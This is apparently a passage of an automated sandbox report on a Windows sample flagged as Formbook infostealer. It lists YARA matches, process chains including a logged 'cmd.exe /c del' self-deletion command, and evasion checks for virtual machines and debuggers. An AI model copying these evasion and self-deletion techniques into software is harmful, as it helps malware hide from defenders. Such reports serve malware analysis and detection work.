          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_01038C60
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0104C7A0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_01032FB0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: String function: 0380B150 appears 35 times
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: String function: 00A1B150 appears 35 times
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: String function: 0041A0A0 appears 38 times
          Source: 1cec9342_by_Libranalysis.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: 1cec9342_by_Libranalysis.exe, 00000000.00000003.645430584.000000001EEAF000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 1cec9342_by_Libranalysis.exe
          Source: 1cec9342_by_Libranalysis.exe, 00000001.00000002.693898854.0000000000C9F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 1cec9342_by_Libranalysis.exe
          Source: 1cec9342_by_Libranalysis.exe, 00000001.00000002.693999734.0000000000D72000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamewlanext.exej% vs 1cec9342_by_Libranalysis.exe
          Source: 1cec9342_by_Libranalysis.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 00000000.00000002.657286033.0000000002340000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.657286033.0000000002340000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000001.650458502.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000001.650458502.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.693950928.0000000000D20000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.693950928.0000000000D20000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.693323611.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.693323611.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.906821366.0000000001030000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.906821366.0000000001030000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.907308680.00000000032A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.907308680.00000000032A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.693535798.00000000009B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.693535798.00000000009B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.907353969.0000000003300000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.907353969.0000000003300000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.1cec9342_by_Libranalysis.exe.2340000.4.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.1cec9342_by_Libranalysis.exe.2340000.4.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.1cec9342_by_Libranalysis.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.1cec9342_by_Libranalysis.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.1cec9342_by_Libranalysis.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.1cec9342_by_Libranalysis.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.1cec9342_by_Libranalysis.exe.2340000.4.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.1cec9342_by_Libranalysis.exe.2340000.4.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.1cec9342_by_Libranalysis.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.1cec9342_by_Libranalysis.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.1cec9342_by_Libranalysis.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.1cec9342_by_Libranalysis.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/3@14/9
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 0_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 0_2_0040460D GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 0_2_0040216B CoCreateInstance,MultiByteToWideChar,
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3980:120:WilError_01
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeFile created: C:\Users\user\AppData\Local\Temp\nsz26A1.tmpJump to behavior
          Source: 1cec9342_by_Libranalysis.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: 1cec9342_by_Libranalysis.exeVirustotal: Detection: 54%
          Source: 1cec9342_by_Libranalysis.exeMetadefender: Detection: 20%
          Source: 1cec9342_by_Libranalysis.exeReversingLabs: Detection: 82%
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeFile read: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe 'C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe'
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeProcess created: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe 'C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe'
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\wlanext.exe C:\Windows\SysWOW64\wlanext.exe
          Source: C:\Windows\SysWOW64\wlanext.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeProcess created: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe 'C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe'
          Source: C:\Windows\SysWOW64\wlanext.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe'
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
          Source: 1cec9342_by_Libranalysis.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000004.00000002.919087839.0000000005A00000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: 1cec9342_by_Libranalysis.exe, 00000000.00000003.645751865.000000001EC00000.00000004.00000001.sdmp, 1cec9342_by_Libranalysis.exe, 00000001.00000002.693732282.0000000000B0F000.00000040.00000001.sdmp, wlanext.exe, 00000007.00000002.907697091.00000000037E0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: 1cec9342_by_Libranalysis.exe, wlanext.exe
          Source: Binary string: wlanext.pdb source: 1cec9342_by_Libranalysis.exe, 00000001.00000002.693987573.0000000000D60000.00000040.00000001.sdmp
          Source: Binary string: wlanext.pdbGCTL source: 1cec9342_by_Libranalysis.exe, 00000001.00000002.693987573.0000000000D60000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000004.00000002.919087839.0000000005A00000.00000002.00000001.sdmp

          Data Obfuscation:

          barindex
          Detected unpacking (changes PE section rights)Show sources
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeUnpacked PE file: 1.2.1cec9342_by_Libranalysis.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_0040102D pushfd ; ret
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_004160CD push 00000033h; iretd
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_004161E9 push es; retf
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_0041624E push es; retf
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_0041B3B5 push eax; ret
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_0041B46C push eax; ret
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_0041B402 push eax; ret
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_0041B40B push eax; ret
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00418F45 push es; ret
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_0041CFEE push dword ptr [C5AA8973h]; retn EADCh
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A6D0D1 push ecx; ret
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_1_0040102D pushfd ; ret
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_1_004160CD push 00000033h; iretd
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_1_004161E9 push es; retf
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_1_0041624E push es; retf
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0385D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_010461E9 push es; retf
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_010460CD push 00000033h; iretd
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0104C381 pushad ; retf
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0104B3B5 push eax; ret
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0104624E push es; retf
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0104B402 push eax; ret
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0104B40B push eax; ret
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0104B46C push eax; ret
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_01048F45 push es; ret
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeFile created: C:\Users\user\AppData\Local\Temp\nsu26D1.tmp\8t7v9o92aq2mtu.dllJump to dropped file
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\wlanext.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeRDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeRDTSC instruction interceptor: First address: 000000000040897E second address: 0000000000408984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\wlanext.exeRDTSC instruction interceptor: First address: 00000000010385E4 second address: 00000000010385EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\wlanext.exeRDTSC instruction interceptor: First address: 000000000103897E second address: 0000000001038984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_004088B0 rdtsc
          Source: C:\Windows\explorer.exe TID: 7036Thread sleep time: -55000s >= -30000s
          Source: C:\Windows\SysWOW64\wlanext.exe TID: 5012Thread sleep time: -50000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\wlanext.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\wlanext.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 0_2_0040646B FindFirstFileA,FindClose,
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 0_2_004058BF GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 0_2_004027A1 FindFirstFileA,
          Source: explorer.exe, 00000004.00000002.918922090.00000000058C0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000004.00000000.673150104.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.669248247.0000000006650000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.673150104.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.665465411.0000000004710000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
          Source: explorer.exe, 00000004.00000002.918922090.00000000058C0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000004.00000000.673301906.000000000A716000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
          Source: explorer.exe, 00000004.00000002.918922090.00000000058C0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000004.00000000.673364825.000000000A784000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
          Source: explorer.exe, 00000004.00000002.918922090.00000000058C0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\wlanext.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_004088B0 rdtsc
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00409B20 LdrLoadDll,
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 0_2_6FD710A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A590AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A4F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A4F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A4F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A19080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A93884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A93884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A158EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AAB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AAB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AAB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AAB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AAB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AAB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A2B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A2B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A2B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A2B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A4002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A4002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A4002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A4002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A4002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AE4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AE4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A97016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A97016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A97016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AE1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AD2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A30050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A30050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A461A0 mov eax, dword ptr fs:[00000030h]
